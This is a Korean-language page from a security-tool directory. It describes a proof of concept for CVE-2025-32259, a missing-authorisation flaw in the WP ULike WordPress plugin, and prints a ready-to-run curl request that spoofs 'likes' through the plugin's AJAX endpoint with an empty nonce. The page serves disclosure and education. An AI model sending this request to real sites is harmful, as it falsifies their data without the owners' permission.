Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
wp-ulike-cve-2025-32259-poc — 영향을 받는 WP ULike 플러그인 버전에서는 특정 AJAX 동작이나 투표 조작을 허용하기 전에 적절한 인가 확인이 수행되지 않습니다. 이로 인해 인증되지 않은 사용자가 로그인한 사용자만 수행할 수 있어야 하는 방식으로 플러그인과 상호작용할 수 있으며, 잠재적으로 투표를 왜곡하거나 오해를 불러일으키는 데이터를 주입할 수 있습니다. | Kitploit
도구/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

영향을 받는 WP ULike 플러그인 버전에서는 특정 AJAX 동작이나 투표 조작을 허용하기 전에 적절한 인가 확인이 수행되지 않습니다. 이로 인해 인증되지 않은 사용자가 로그인한 사용자만 수행할 수 있어야 하는 방식으로 플러그인과 상호작용할 수 있으며, 잠재적으로 투표를 왜곡하거나 오해를 불러일으키는 데이터를 주입할 수 있습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1년 전아직 검토되지 않음

WP ULike ≤ 4.7.9.1 - 인증되지 않은 콘텐츠 스푸핑 (CVE-2025-32259)

🔬 WordPress용 WP ULike 플러그인의 CVE-2025-32259를 시연하는 간단한 PoC입니다.
🚨 교육 목적으로만 사용하세요 – 명시적 승인 없이 시스템을 테스트하지 마세요.


🧠 개요

WP ULike는 사이트에서 사용자가 콘텐츠에 좋아요를 표시할 수 있게 해주는 인기 있는 WordPress 플러그인입니다. 4.7.9.1까지의 버전에는 인증 누락 취약점이 존재하며, 인증되지 않은 사용자가 AJAX 요청을 통해 "좋아요" 작업을 스푸핑할 수 있습니다.

  • CVE: CVE-2025-32259
  • 취약한 버전: ≤ 4.7.9.1
  • 수정된 버전: 4.7.9.2

🚀 개념 증명

이 취약점으로 인해 인증되지 않은 사용자가 AJAX 엔드포인트와 상호 작용하여 권한 없이 모든 콘텐츠(게시물, 댓글 등)에 좋아요를 표시할 수 있습니다.

🔧 PoC 스크립트

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

id=1을 유효한 게시물 ID로 바꾸세요.

성공적인 응답은 다음과 비슷할 수 있습니다: {"status":"success","msg":"You liked this."}

도구 다운로드